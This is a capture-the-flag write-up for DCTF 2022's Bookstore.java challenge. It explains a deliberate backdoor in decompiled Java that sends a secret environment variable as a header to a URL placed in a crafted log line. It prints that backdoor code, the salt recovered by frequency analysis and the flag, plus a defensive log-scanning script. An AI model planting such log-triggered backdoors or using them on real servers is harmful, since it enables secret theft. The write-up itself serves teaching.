
VaiTon for Ulisse

Originally published at ulisselab.github.io

Bookstore.java - DCTF 22

I took part in DCTF 2022 with team Ulisse from the University of Bologna.

The Bookstore.java challenge stated that:

Web developer left the company because he was not being paid. He left some hidden features for him, to bypass security. Can you find the vulnerability? http://book-store.dragonsec.si

And gave us a book_store.jar file.

The Log4Book

If we open the jar file with a decompiler (like JD-GUI), we can see that there is a vulnerability in the log analyzer: a log message of a specific shape makes the server perform an outbound request.

// Decompiled from book_store.jar: the trigger pattern is built from the SALT env var
Pattern pattern2 = Pattern.compile("get\\{.*\\}salt=" + System.getenv("SALT"));
Matcher matcher2 = pattern2.matcher(mssg);
String substring2 = null;
if (matcher2.find()) {
    substring2 = matcher2.group();
}
if (substring2 != null) {
    // 123 and 125 are the ASCII codes of '{' and '}': the text between the braces is used as a URL
    downloadFile(substring2.substring(substring2.indexOf(123) + 1, substring2.indexOf(125)));
}

If the log string contains the template get{...}salt= followed by the value of the environment variable SALT, the program sends an HTTP GET request to the URL between the braces, with a Not-Found request header whose value is the environment variable NOT_FOUND (which I suppose is the flag).

// downloadFile(url): the secret NOT_FOUND value is sent as a request header
URL link = new URL(url);
link.toURI();
HttpURLConnection conn = (HttpURLConnection) link.openConnection();
conn.setRequestMethod("GET");
conn.setRequestProperty("not-found", System.getenv("NOT_FOUND"));
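From a defender's side, the interesting property of this backdoor is that its trigger has a fixed shape in the logs, whether or not the salt is right. The following Python is an added example, not code from the challenge or the writeup: it scans constructed sample log lines for the get{...}salt= trigger and mirrors the decompiled indexOf(123)/indexOf(125) extraction so the exact string handed to downloadFile is visible. The log lines and the example.invalid target are constructed.

```python
import re

# Constructed sample log lines (not from the challenge). Line 3 carries the
# trigger shape; line 4 has braces but no "salt=", so it must not be flagged.
SAMPLE_LOG = """\
2022-04-09 10:00:01 INFO  GET /books?page=1 200
2022-04-09 10:00:02 INFO  GET /books/search?q=hamlet 200
2022-04-09 10:00:03 WARN  GET /books?page=get{http://example.invalid/collect}salt=oeeeeooo 200
2022-04-09 10:00:04 INFO  GET /books?page=get{no-salt-here} 200
"""

# The decompiled Java only fires when the text after "salt=" equals the SALT
# env var. A detector does not need the salt: any occurrence of the trigger
# shape is suspicious, so the salt is captured but not checked.
TRIGGER = re.compile(r"get\{(?P<target>[^}]*)\}salt=(?P<salt>\S*)")


def find_triggers(log_text):
    """Return (line_no, target_url, salt_seen) for each line carrying the trigger."""
    hits = []
    for no, line in enumerate(log_text.splitlines(), start=1):
        m = TRIGGER.search(line)
        if m:
            hits.append((no, m.group("target"), m.group("salt")))
    return hits


def extract_target_like_java(matched):
    """Mirror of the decompiled extraction: the text between the first '{'
    (char 123) and the first '}' (char 125) of the regex match."""
    return matched[matched.index("{") + 1:matched.index("}")]


if __name__ == "__main__":
    for no, target, salt in find_triggers(SAMPLE_LOG):
        print(f"line {no}: outbound request to {target!r} (salt seen: {salt!r})")
```

Because the Java regex uses a greedy .* between the braces, the URL the server actually uses is still cut at the first closing brace by indexOf(125); extract_target_like_java reproduces that, which matters when reviewing what a flagged line would have made the server fetch.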

Finding the SALT environment value

We're given a hint:

The method by which the salt is generated is given through variable names in one Java class. The salt is 8 chars long.

If we look at the class Art we can see that there are two strange variable names:

String frequency = fontType.getValue();
int analysis_should_be_fun = findImageWidth(textHeight, artText, frequency);

which, read together, spell out: frequency analysis should be fun

Analyzing the frequency

Inside the jar we find a book.json file, which contains 8 paragraphs of a Shakespearean play.

After trying to find some studies about the frequency analysis of Shakespeare's plays without any result, we remembered that the hint stated that the salt is 8 chars long, and that there are exactly 8 paragraphs both on the page presented by the website and in the file book.json.

If we join the most frequent letter of each paragraph, we get the salt. With it we can make the program send its request to a URL we control (an ngrok tunnel), and the flag arrives in the Not-Found header.

Salt: oeeeeooo
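The salt derivation is simple enough to script, and scripting it makes the implicit choices explicit: count letters only, ignore case, and define what happens on a tie. The Python below is an added example, not the team's solver or anything from book.json; the eight paragraphs are constructed stand-ins, written so that each has a clear winner and the joined result happens to equal the writeup's salt. The tie-break rule (alphabetically earlier letter wins) is an assumption, since the real paragraphs had no tie.

```python
from collections import Counter

# Constructed stand-in paragraphs (book.json itself is not reproduced here).
# Each is written so its most frequent letter is unambiguous.
PARAGRAPHS = [
    "Good morrow, good morrow to thee.",                 # o
    "Sweet are the uses of adversity, thee.",            # e
    "Men were deceivers ever, one foot in sea.",         # e
    "Let me be the pen here.",                           # e
    "The weeds grew deep and green.",                    # e
    "Romeo, Romeo, wherefore art thou Romeo?",           # o
    "Soft, no more to do, go slow, go on.",              # o
    "O, how good to know our own home.",                 # o
]


def most_frequent_letter(text):
    """Most frequent ASCII letter in text, case-insensitive.
    Ties go to the alphabetically earlier letter (assumed rule; the real
    paragraphs produced no tie)."""
    counts = Counter(ch for ch in text.lower() if "a" <= ch <= "z")
    if not counts:
        raise ValueError("paragraph contains no letters")
    return min(counts, key=lambda ch: (-counts[ch], ch))


def derive_salt(paragraphs, expected_len=8):
    """Join the most frequent letter of each paragraph.
    The hint fixes the salt at 8 chars, so a paragraph count that does not
    match is reported instead of silently producing a salt of the wrong length."""
    if len(paragraphs) != expected_len:
        raise ValueError(f"expected {expected_len} paragraphs, got {len(paragraphs)}")
    return "".join(most_frequent_letter(p) for p in paragraphs)


if __name__ == "__main__":
    print(derive_salt(PARAGRAPHS))
```

Against the real book.json the only change is loading the eight paragraph strings from the file; the letter filter matters because punctuation and spaces would otherwise dominate the counts.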

Flag: dctf{L0g_4_hid3n_d@7@_n0t_s0_h@rd_righ7}
